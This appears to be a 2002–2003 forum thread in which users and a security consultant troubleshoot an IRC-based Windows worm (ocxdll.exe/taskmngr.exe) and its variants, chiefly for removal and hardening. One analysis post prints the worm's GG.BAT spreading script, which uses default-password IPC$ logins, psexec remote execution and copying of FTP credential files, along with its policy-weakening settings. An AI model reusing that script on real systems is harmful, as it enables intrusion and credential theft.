My grisoft anti-virus detected the hidewindows and 'healed' it, but upon restarting, it still hangs. I can only ctrl*alt*delete to the Win task manager and manually start the a/v program or others. I have enough knowledge to be 'dangerous' but not enough to figure how to get to a "find" prompt or start the reg-edit type process to delete files or rename suspect files.

Any ideas how I can get my puter back to a regular desk top enviroment or how I can task manager my way to check my registry for the listed files?

Jean Garcia-Gomez
jeangarcia@yahoo.com
01/09/03
Thanks to all who have contributed to saving our home networks from these viral vandals. Thanks especially to you Kyle. I too am having the same issue as everyone else with regards to the ocxdll.exe trojan worm virus whatever you want to call it. The funny thing is that I keep deleting all the files aforementioned and deleting the registry entries, as well as restore the security settings, yet it seems to keep recurring on my Win2000 system. The only program I was unable to delete was mdm.exe. I found dll16.nt, dll32.hlp, dll32nt.hlp, gg.bat, kill.exe, mdm.exe, ncp.exe, nt32.ini, psexec.exe, seced.bat, task32.exe, tftp8675, and xvpll.hlp. I did not find gates.txt, httpsearch.ini, mdm.scr, mt.exe, v.exe, or psexec.exe. I have a feeling somewhere on my server the trojn is still "hiding", being activated somehow when my server is turned on, or perhaps a port i opened and a hacker has infected my computer again.

I have downloaded the Anti-Trojan program and will attempt to see if it finds anything that I missed. My Norton Antivirus program failed to detect these files as being viruses. Also, when NAV finally did detect them, it could not qurantine or repair them. If I happen to receive this file again, I will forward it to you Kyle. And I will install a firewall as recommended.

Thanks to you all once again.

Kyle Lai
klai@klcconsulting.net
01/10/03
Thanks for the comments.

Be careful about mdm.exe. It COULD be a legit windows program. You need to right click on the mdm.exe file you found and check its file properties (right click on the file and goto properties), and click on the version tab to see the information about the file. If the comapny is Microsoft, original name is mdm.exe, product name is one of Microsoft products, you might be OK.

As I have mentioned many times, swat-it and ad-aware (you can search the links from my earlier comments) are complementary to the anti-virus software. anti-virus software alone is not enough.

If you can't seem to remove the files, run swat-it and ad-aware and let's see if they helps. Most likely they will remove a bunch of "bad" files for you.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
http://www.klcconsulting.net

Peter Davis
petermdavis@iprimus.com.au
01/11/03
taskmngr.exe \ tskmgr.exe win xp pro
The file C:\WINDOWS\SYSTEM32\tskmgr.exe is infected with the Backdoor.Sdbot virus.
Unable to delete the file.
I have deleted the file using safe mode and then quarriantine with norton 2002 , then deleted, haven't had a problem since, it may be from quicktime, as I installed one supplied with a manufactured civil engineering package, it is a small server fil that uses a port to access the net and allow the perpitrator
access,if it's the same one I had you may have had unusual dialup at the beginning of your windows startup, if it's a necessary file required by windows, just extract a new one from the cd the folder is x:\I386 TASKMGR.EX_
Filip Wtterwulghe
filipw@skynet.be
01/13/03
Hello,

Eversince I had the trojan that was listen here above I can't seem to share my internetconnection anymore . I can share directories ... but no Internet Connection . I have done al steps to remove the trojan ( see posting off aladin aladin168@hotmail.com 09/05/02 ) and to reset all userrights as before . But still it doesn't work .

What could it be ?

Hoping to hear from you .

Filip W.

some1

01/16/03
hey, to delete servudamon.ini just type
net stop serv-u
in dos command
and than u'll be able to delete it,
btw, can u post ocxdll.exe some where? I want to inspect it.
javier leon
javierleon30@hotmail.com
01/17/03
kazaa
i'm trying to find kazaa but in a zipped folder because my laptop doesn't allow setups so if anyone know where to get it please contact me to my e-mail.
Lea

01/19/03
I started running a net stat to figure out whats sending data across the network ehn I'm not doing anything.there was always a tcp connection open to t.opless.biz:95?? on some , when I go to the web site it redirects to another site.
After killing netlogn.exe the connection stopped.
I then realiased I can't access my registiry settings or change my admin password, and I have all the trojan files on my machine
abc2.dll ,adobes.exe and adobea.exe (which I mistook for reader)

I think i'm going to reformat my machine now. I dont see what else I ca do

salsa
choi_boy_@hotmail.com
01/19/03
when ever i want to run a program, message pops up
"cannot find the file 'file directory'(or one of its components). make sure the path and filename are correct and that all required libraries are available."

THIS MESSAGE POPS up every time i try running a program... winamp, quicktime, msn doesnt work!
and when i try to check properties or other security stuffs it will denie the access...
is this related to the mIRC trojan?
because after i got that mIRC trojan worm my copmuter got hacked and got really screwed up...
Im thinking of formating my drive... this REALLY SUCKS

salsa

01/19/03
Lea i have the same problem!
Lea i have the same problem!
DOES ANYONE KNOW HOW TO SOLVE THIS?!
-or ill just format my drive
Leah

01/20/03
Salsa,
Given that someone probably ran a bunch of commands on my machine which I use heavily, I'm more concerned about identity theft.

I've installed XP now , changed most my passwords and I'm going to check my equifax reports.

I'd really like to know why I had a connection to t.opless.biz [65.116.90.25] when I had made no connections to the internet and I had no known applications runnning

dcdon

01/20/03
FOUND ABOUT this W O R M
++
SMB over TCP attack, using port 445. It looked for vulnerability in
weak administrator id and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with ocxdll.exe virus. This
occurred back in 8/28/2002 at 3am. After some detailed analysis, I
have determined that it was a Trojan, deleted the detected registry
entries, delete the infected files, tighten the administrator ID and
password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (If they
have a backup .sdb file, then just reapply the security policy would
fix this part), add users back to local. The cause is bad security
(admin ID and passwords), and a backdoor to drop the ocxdll.exe.

Effected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows
2000
- Windows NT - might be infected, but will not distribute or change
security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more
random characters
4. It ran the bot (robot) scripts in the following order, which means
they contained malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor
(SecEdit.exe /configure) command and reset the security policy to
default settings, and replace security settings in the TFT8675. This
is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the
real program that started the hacking.
7. It tries to hack into the system using the following user ID and
password. If you don't have these user id and passwords, maybe you
are just infected with 1 system, and it could not spread via this
Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If file were there, copy it
anyway, and do it quietly. (using psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which
extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory.
(maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc
client.
12. The scripts were kicked in to HIDE the mirc window, so you can
ONLY see it in the process. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either
attempt failed or attempt successful.
++
Disclaimer: The irc bot scripts have not fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe
involved, which is the NetCat program. This program allows the
hackers to gain full control to your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data
were lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure
they are strong passwords! Use mix of Uppercase, Lowercase, numbers,
and non-alphanumeric, i.e. _,+,=,), ...
4. If possible, change Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit
/configure C:\WINNT\security\Database\ secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security
Policy, click on "User Rights Assignments", and add users and groups
back into the policy. "Access this computer from the network". The
default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your Firewall and ANY all unwanted traffic from accessing
ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a
user id called "Administrator" with NO GROUPS. This will allow you to
monitor anyone trying to use the "Administrator" login.
3. Setup security log, at minimum, log successful and failed
Logon/Logoff., and monitor the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant "configure your system setting with the
default security policy, plus the additional settings in tftp8675".
It basically removed many security restrictions, remove all audits for
the systems, and of course remove all users in the "Local Users
allowed from the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracted file that included 17 files. It is a
Trojan and it's a worm. In the dll32nt.hlp, it has an instruction to
do IP scan, and store the 20 IP address it found. Mostly likely it
scanned the subnet and file server that were connected to the victim
systems at that time. Then it has an instruction at the end to run
GG.BAT, which is the instruction to attack the 20 IP's that just
found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:
--
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

--
from SysInternals, here is the description of what the PSEXEC
parameters do:
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
non-interactive applications.
--

swips88

01/20/03
Just struggled through a varient of this virus.
came in on abcd.jpg
It was a text file not an image file, w/ first line:
"on *:TEXT:*:*:{
I was not aware a jpg could do this?? Is this activated just by viewing in browser or e-mail?

It altered my registry as follows with "epgcj.exe" (virus)running on every boot up:

Key Name: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Class Name:
Last Write Time: 12/10/2002 - 11:37 PM
Value 0
Name: epgcj
Type: REG_SZ
Data: epgcj.exe 

Value 1
Name: MSKCES32
Type: REG_SZ
Data: C:\WINNT\msapps\dir\clt.exe

Value 2
Name: Synchronization Manager
Type: REG_SZ
Data: mobsync.exe /logon

Value 3
Name: TkBellExe
Type: REG_SZ
Data: C:\Program Files\Common Files\Real\Update_OB\evntsvc.exe -osboot

Note the date of this bugger:
12/10/2002
I believe QuickTime was also recently installed or updated? This machine had Administrator and no password! The machine also is not re-booted often so I am not sure when it was originally infected. I only located it when I noticed 2 quick DOS screens opening and closing during a recent boot, or log-on. I only figured it out when I logged on without internet connection present (disabled NIC card) message on log-on was:
"host not found= stole.no-ip.infoservice"

The actual ip of clone server, found in abcd.jpg file = 216.127.74.108

I searched my system for other files with the same or close dates and found a slew of them which I deleted (and saved copies). They were in WINNT\msapps\dir, and WINNT\system32.

One which was copied by a bat file from \system32 to WINNT\msapps\dir was msappsa.exe

Hope I found most of the mess. Anything further I should do?

Serge Shpichuk

01/21/03
NAV 2003 was installed on my computer AFTER Internet was installed, so one of my files was infected by IRC.Mimic.When i'm running scan with NAV from the computer it gets nothing,but when i'm using scan from the Internet "Symantec Security Check" it says : "os32.ini is infected with IRC.Mimic. What should i do? "Live Update" doesn't help, nothing else either.Please help me to get rid of it.
Kyle Lai
klai@klcconsulting.net
01/23/03
Wow, this discussion group is getting technical...

Anyway, for part1 and part 2 of the technical analysis on the ocxdll.exe / taskmngr.exe original (not variants) Trojan, check out http://www.klcconsulting.net/mirc_virus_analysis.htm . Part 2 of the analysis gives the instructions to remove that Trojan/Worm/Virus.

People's concern about identity theft is VERY REAL. Some variants I analyzed have the capability of stealing any credit card, password info you saved on your computer. It means, if you ever click "save my password so I don't have to login next time", those passwords might have been stolen.

If you think the damage is bad, save critical files and format it and rebuild it, and do it right this time. It'll help to prevent the next virus/trojan attacks.

Here are the quick 10 steps I can recommend for re-building your system.
1. Backup your critical data
2. Format your system
3. Install Operating System
4. Rename your "Administrator" userID to something like "_admin" or "[name]_admin" (i.e. "kyle_admin") Make sure you memorize you did this, or write it down.
5. Rename your "Guest" userID to something else, i.e. "guest_user". Write down your changes.
6. Set strong passwords for your administrator account. Use combination of alphabets, numbers, and if possible, use special characters like "+", "_", "-" in the password to make it even harder to guess. Make the passwords at least 7 characters long.
7. Install following software (mentioned in 9/24/2002):
7a. Install an anti-virus software with the latest definition file. Paid anti-virus software is better. If you don't have one, download a free one, AVG Free edition. It has the with update capability too: http://www.grisoft.com

7b. Install an Anti-Trojan software on top of the Anti-Virus software. Anti-Virus software does not usually detect Trojans and Hacker software that were installed during an intrusions. Paid versions like Pest Patrol are good. If you don't have one, get a free one. It's great and it's Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html

7c. Install Ad-Aware software, which is for removing the advertising software that web advertisers installed on your systems without your acknowledgement. This happens simply by just surfing the Web... You'll be surprised how many adwares on your systems. This one is free and available at : http://www.ad-aware.com

7d. Get a personal Firewall for your computers. Symantec and McAfee also make personal firewalls and they are effective. If don't have one, Use the FREE firewall software, Zone Alarm. It's available at http://www.zonealarm.com

8. Make sure you have all the software patches up to date. This include the Operating System, Internet Explorer, Instant Messengers, Anti-virus, Anti-Trojan, Firewall software, and etc... Windows 2000 & XP have "Windows Update" features, so take advantage of that.

9. If you have cable modem/DSL services, get a Cable Modem/DSL Router, which usually have a built-in firewall. This router will be your first line of defense, and your systems are hiding behind it. If a virus or an intruder start an attack, your computer will not get hit directly. This adds another layer of defense.

10. If you are a technical person who uses "net stat", use TCPView from Sysinternals. It shows more information and it's easier to track viruses/Trojans. You can get that at http://www.sysinternals.com/ntw2k/source/tcpview.shtml.

If you follow these 10 steps, you should have a better experience this time.

My firm does more commercial forensic, virus analysis and IT security services. If your case is beyond the "home computers" and require special security services, feel free to contact me directly.

Good luck!
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
http://www.klcconsulting.net

John
jrestrepo@yahoo.com
01/25/03
Thanks for all the help. I was wacked by this also. Is there still a desire for "OCXDLL.EXE" that uses/abuses task32.exe?
John
jrestrepo@yahoo.com
01/25/03
FOLLOW-UP: Never mind about the file (OCXDLL.EXE), I already deleted it.
chris
magpie66_mx@yahoo.com
01/30/03
taskmngr.exe is now winclock.exe
If you've looked for taskmngr and it's not in your reg or anywhere else for that matter and yet mirc still starts up when u boot try looking for winclock.exe as this is also mirc.exe in disguise. If that is not it then it may be constantly changing so when it boots up run task manager and u will see it there highlight it and right click it and select go to process there it is !! Then search for the file and it will be in winnt/system32.
Rob
radmin@comcast.net
01/31/03
I just got hit by a variant of this virus. Not sure how, as this is a pretty clean machine. It may have been when I installed quicktime?

Anyway, I've removed Winclock from the registry, but it's still running mirc and UPDATE when it starts.

I'd rather not completely reinstall. Can someone summarize procedures for this variant?

Are there any freeware virus utilities anymore?

Kyle Lai
klai@klcconsulting.net
01/31/03
For people who reported the infection was related to Quicktime installation, can you share your installation process?

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc
www.klcconsulting.net

Bob
toplinedesign@hotmail.com
02/04/03
Just curious If anyone else had run into the same problems I have getting rid of this taskmngr.exe virus. First let me say Thanks to everyone who has posted here all your info was a great help. But every time I rebooted the same two infected files kept showing back up. taskmngr.exe and win32hp.exe even thought I could not locate these files anywhere on my system nor in any registry entry. My Virus software showed that they were in the windows/system32/netbios.exe/ directory but there was no such directory. I just happened to stumple across this file which is not a directory at all but a file name netbi0s.exe (with a zero not an o in the name) once I scanned his file it showed up that these two infected files were actually hidden within this file. Once deleted the infected files did not reappear on my next virus scan.

Just thought I would put my 2 cents worth in.

Bob

Kyle Lai
klai@klcconsulting.net
02/04/03
Hi Bob,
If possible, please send netbi0s.exe file (in zip file if possible) to me at kyle@kylelai.com. I am interested in taking a look at it.

Please tell us what OS you are using. If it's XP, you have to disable the system restore mode during the virus removal process, otherwise, every time you reboot, XP will restore your deleted files, possibly including viruses you removed.

To disable the system restore in XP, follow the direction from Symantec: http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc
www.klcconsulting.net

Kris
kris@studio135.fslife.co.uk
02/16/03
Great work!

I didn't realise I had this until I tried to uninstall a few old programs to try and speed my system up. Eventually Win2k didn't boot up at all and I had a box asking if I wanted help connecting with mIRC. Not knowing what it was, I clicked no.

I had mIRC twice in the Uninstall Programs box, which it wouldn't let me ununstall as it was running. I couldn't find it in the task manager so I did a web search, found this site, and here was a reference to HideMyPornoExe, which I frequently saw on bootup but couldn't find!!

A lot of these files were found in my C:\windows\fonts directory if that helps.

I installed ZoneAlarm 10 minutes ago, and over 1700 intrusions have already been blocked, about 200 being "high rated"

Many thanks

Kyle Lai
klai@klcconsulting.net
02/16/03
FYI, base on Symantec anti-virus website, there has been some new variants, and seems like they have been getting wild out there.

I haven't seen the actual virus/worm/Trojan file; so if you have the file, please send it to me at kyle@kylelai.com for analysis.

This time it deceived victims by using the "explorer.exe" installed by this worm/Trojan. The REAL Windows explorer is located at "winnt\explorer.exe", but this Trojan installs its own explorer.exe at "%system%", which is usually "winnt\system32\explorer.exe."

Here is a list of files from this variant according to Symantec (http://securityresponse.symantec.com/avcenter/venc/data/backdoor.irc.zcrew.html .) File names have been completely changed, and might have new functionalities.

1. Create the following files in the %System% folder:
Bootdrv.dll *
Explore.dat
Explore.exe
Explorer.exe *
Iiscache.dll
Libparse.exe
Moo.dll *
Navdb.dbx
Psexec.exe *
Rcfg.ini
Rconnect.con
Rconnect.exe *
Secure.bat
Str.vxd
Svchost32.exe *
V32driver.bat
Web.swf *

2. Create the folder, %System%\www, in which it creates these files:
Mdx.dll*M
Moo.dll *
Views.mdx *

It also creates the registry value:

ccreg %system%\explorer.exe

in the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

arkk
arkk@concentric.net
02/18/03
I have just discovered a "PSEXESVC.EXE" virus/trojan on my computer. So far suspected files are:

PSEXESVC.EXE (60KB)
dire.exe (16KB)
newexplor.exe (16KB)
ratsou.exe (16KB)
tbbspu.exe (16KB)

Seeems to be a variation of an IRC trojan/virus. If anybody has any information or suggestions on cleaning/removal - please share :)

Chris

02/18/03
servudaemon.exe - Entry Point Not Found
Is there anyone who can help to explain this:-

"Servudaemon.exe - Entry Point Not Found"
"The procedure entry point SymGetLineFrom Addr could not be located in the dyanmic link library IMAGEHELP.dll"

My guess is that I have ben attacked by a virus that I can't recognise.

Kyle Lai
klai@klcconsulting.net
02/19/03
Hi Chris,
Yes. Servudaemon.exe indicated that you have been hit by a virus/Trojan, which indeed has owned your system, and installed a ServU FTP server on your system, and possibly tried to use your system to share some files. Usually these viruses try to setup FTP services for file sharing on IRC. Systems that are on high bandwidth networks (T1/T3 or above) are more likely to get attacked.

Since you are having some error messages, maybe you are OK because the ServU FTP server couldn’t be started properly on your system.

Try to run anti-virus and anti-Trojan on your system to detect and remove this virus. Also, try to use the software on described on 9/24/2002 to help you secure your system(s).

Good luck,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Harvey Jacobs
harveyjacobs@nf.sympatico.ca
02/22/03
I got this trojan on my server but mIRC was never installed on any computer in my office so how else did i get this trojan?

If you can tell me how i got it plz e-mail me thx harveyjacobs@nf.sympatico.ca

Kyle Lai
klai@klcconsulting.net
02/24/03
Harvey,
If you get this worm/Trojan, that means your server is not secure. Your server had weak administrator password.

I am not sure if you have a firewall on your network. If not, you will certainly get this worm/Trojan because it is very wild on the Internet. If you do have a firewall, make sure you close port 445 because that's what this Trojan uses.

Hope this helps,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Eric

02/25/03
Hi all.

Thanks for all who gives invaluable information here.

I believe I found 2 variants of this trojan from 2 Win2k machines in my office.

== the 1st variant ==
The original file is
- run32dll.exe

It expands itself to the following files:
- 32dllemu.txt
- blah1.gif
- cygwin1.dll
- firedaemon.exe
- msnmngr.exe
- pulist.exe
- services1.bat
- ServUStartUpLog.txt
- software.config
- tar.exe
- winlog.exe

This one will create a private ftp server on the victim machine...

== the 2nd variant ==
The original file is
- netmon32.exe

It expands itself to the following files:
- dpd.bat (script to brute force trying uid/passwd guessing)
- kabomon (reset security settings)
- kill.exe (killing a windows program)
- mnt32.exe (hide the window of a program)
- mnt32.scr (a list for picking random uid for mIRC)
- nt16.ini (IRC script?)
- nt32.ini (IRC script?)
- psexec.exe (execute a program remotely)
- start.bmp (?)
- twunk_16.exe (mIRC client)
- winhelper.exe (launching an application)
- winlogo.bmp (?)

I am not very familar in analysing those scripts. Therefore, i donno what this trojan is doing besides changing the security settings...

Kyle, do u want to have a copy of the trojan?

Thanks all again for the discussion..

Eric

Kyle Lai
klai@klcconsulting.net
02/25/03
Eric,
Sure, can you please send the worm/Trojan package files to my kyle@kylelai.com account?

run32dll.exe and netmon32.exe.

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

jay

02/28/03
hello and thanks for all the great info. i too had many of the infected files listed, however, i am continually getting a message from AVG regarding an infected SECURE.BAT file and although i've deleted it, it somehow keeps coming back. there is also a folder in system32 called www that keeps appearing even when deleted which i am quite certian is linked to the secure.bat file. has anyone else had this problem? perhaps it's totally unrelated to the ocxdll.exe problem..im not sure. plz help
nicholas
spikeyhairedude@hotmail.com
02/28/03
hey anyone here know where i can get the source code of the windows task manager?
kyle

03/01/03
hey i get that hidemypornoexe window popup whenever i restart the computer but i have gotten rid of the mirc virsus and all of that and i dont or cant find those suspicious registry entries. what do i do?
Kyle Lai
klai@klcconsulting.net
03/02/03
Every operating system behaves differently. Without the information on the operating system, it is not easy to determine the problem.

Please state your operating system and maybe I can give you my 2 cents.

/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

rach

03/05/03
thanks for the advice about the irc trojan. The anti-trojan program I used only detected one of the files ncp.exe and didn't solve the problem. But isolating the files you mentioned above and restarting (which stops taskmngr.exe) solved the hide window error! symptom and hopefully the trojan overall.

Thanks

LOL

03/07/03
Whow
lots of typing
Kyle Lai
klai@klcconsulting.net
03/08/03
There has been another outbreak of a variant of mIRC worm, aka Worm.Win32.Randon.

--
Files in Worm.Win32.Randon Trojan variant - source: viruslist.com
http://www.viruslist.com/eng/viruslist.html?id=59741
--

- Deta.exe - HideWindows utility (WIn32 exe file)
- fControl.a - an IRC script (port scanning and infection remote computers)
- IfCOntrol.a - an IRC script (IRC-channels flooding and DDoS attacks (pinging different addresses) )
- incs.bat - BATCH file (lan resources password cracker)
- Libparse.exe is "PrcView" utility (Win32 EXE file)
- psexec.exe is "PsExec" utility (Win32 EXE file)
- rcfg.ini - IRC INI file (loading other scripts)
- rconnect.conf - configuration file
- reader.w - list of nicknames used by worm to establish connection with IRC-channels
- Sa.exe - TrojanDOwnloader.Win32.Apher
- scontrol.a - helper IRC script.
- sencs.bat - BAT file (this file is transfered to the remote computer to perform TrojanDownloader execution)
- systrey.exe - renamed mIRC client (Wind32 EXE file).

This is similar to the original mIRC worm/Trojan ocxdll.exe with more guessable users and passwords.

Be careful out there. Make sure you have strong passwords, and make sure port 445 & 139 are blocked on your firewall. Strong password is far more important though.

Good luck!
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

joiee
ronan@vandrer.dk
03/08/03
gt bot etc. etc.
when I run swatit it detects:
C:\winnt\system32\svchost32.exe -GT Bot M HideWindow
I click "clean all" and up come the message:
"Cannot create file c:\autoexec.bat."

someon please tell me how to get rid of this thing?
- joiee

Kyle Lai
klai@klcconsulting.net
03/09/03
joiee,

Best way to do this is to rename the file.

Rename "svchost32.exe" to "a.txt", then delete the file.

Good luck,
/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

nklo
nklo@yahoo.com
03/10/03
Kyle Lai,

According to your message on 02/16/03, is that mean I deleted all the files you mentioned can help me to clean up the Trojan Horse Virus? My AVG Anti-Virus system told me that the file "svchost32.exe" and other exe files in my pc is infected.

joiee
ronan@vandrer.dk
03/10/03
hei kyle
- thanks for advice.
I can find -svchost32.- using norton.
but can I delete this file?
it's not a system file?

joiee
denmark

Kyle Lai
klai@klcconsulting.net
03/10/03
nklo/Joiee,

svchost32.exe is involved in many variants because most of the people will think this file is a system file... However, the real system file is called "svchost.exe"... clever...

One mIRC Trojan variant (TROJ_FLOOD.BI.D/IRC_ZCREW) is spreading wildly now, and one of its file is "svchost32.exe." I suspect that you might be infected this worm/Trojan. Please check http://www.klcconsulting.net/mirc_virus_analysis.htm

The best defense as I always mention, is to set STRONG PASSWORDS for all of your user accounts.

On 3/8/2003, I did a experiment to see how fast a Windows 2000 Professional system (honeypot), having the "administrator" userID with no password,can get infected with worms/Trojans on the Internet. I put honeypot on a cable modem for 5 hours, and I was infected with 2 IRC type of worm/Trojans within this time. If you are interested in the result of this experiment, the report will be available on 3/11/2003, on the KLC Consulting Website, http://www.klcconsulting.net/irc_experiment1.htm

Internet is a dangerous place if you don't properly secure yourself for it. Make sure you have Strong Passwords for all accounts you have! That's the least thing you should do.

Good luck!
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Coree

03/11/03
Strange Brew - Win200 pw, trojans and dialers
I purchased a (used) computer from someone recently, and naturally, the first thing I did was get to cleaning house! =o)

Some of the things I've encountered thus far are:
- After several successful boot-ups, my Admin password was changed (remotely?) and I couldn't access the system at all. I had to use some creative programming and some 'white hat' hack-ware to recover it.
- Adware deleted almost 200 files right out of the gate!
- I found 'paradise.exe' on the system, but, SwatIt has yet to identify it (or its components) as a threat.
- Zone Alarm keeps notifying me of access attempts on ports 1026 and various others. (In the past 30 minutes alone, ZA has blocked 5 access attempts).

My questions are as follows:
1) I have NO idea how to change my admin pw back to what it was! *grin* Any help? I'm currently accessing my PC using the VERY unsafe default.
2) If SwatIt is not recognising paradise.exe, does anyone have any suggestions for removal?
3) How can I determine if ZA is finding legitimate threats or just regular network traffic? Thus far, it had blocked all access attempts.

Thanks in advance for your help!

Coree

Eric

03/11/03
A related CERT Advisory is released recently concerning this trojan/worm...

http://www.cert.org/advisories/CA-2003-08.html

Zoe
zoe@solien.com
03/14/03
This site has a few suggestions:
http://www.petri.co.il/forgot_administrator_password.htm

Also, try searching for information on a parallel installation of Windows 2000 to recover the administrator password. My boss did this on one of our servers and it worked.

Kyle Lai
klai@klcconsulting.net
03/14/03
Coree,
If you don't have much stuff on the computer you just purchased, you probably should wipe it clean (FDISK), and then re-build the system. You are welcome to use the 1/23/2003 posting as a guide to build and secure your system.

In terms of recovering Windows 2000/XP password, it can be done relatively easy, it's off topic from this thread, but send me an email and we can discuss this in more details.

Regards,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Kyle Lai
klai@klcconsulting.net
03/18/03
Deloder worm/Trojan hit hard last week...

Deloder worm is also an IRC based worm, and it has the similar characteristics as the original taskmngr.exe/ocxdll.exe, but it uploads a VNC Server component, which allows the worm/Trojan owner to remote control the compromised systems.

I published a detailed Deloder worm/Trojan analysis on 3/11/03, and it is available at http://www.klcconsulting.net/deloder_worm.htm

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/19/03
Dear Kyle,
Thanks for providing good suggestions.
Please clarify me the following:
1.My laptop is infected with viruses,my NAV has detected,
D:\WINNT\System32\Dvldr32.exe
is infected with the W32.HLLW.Deloder virus.
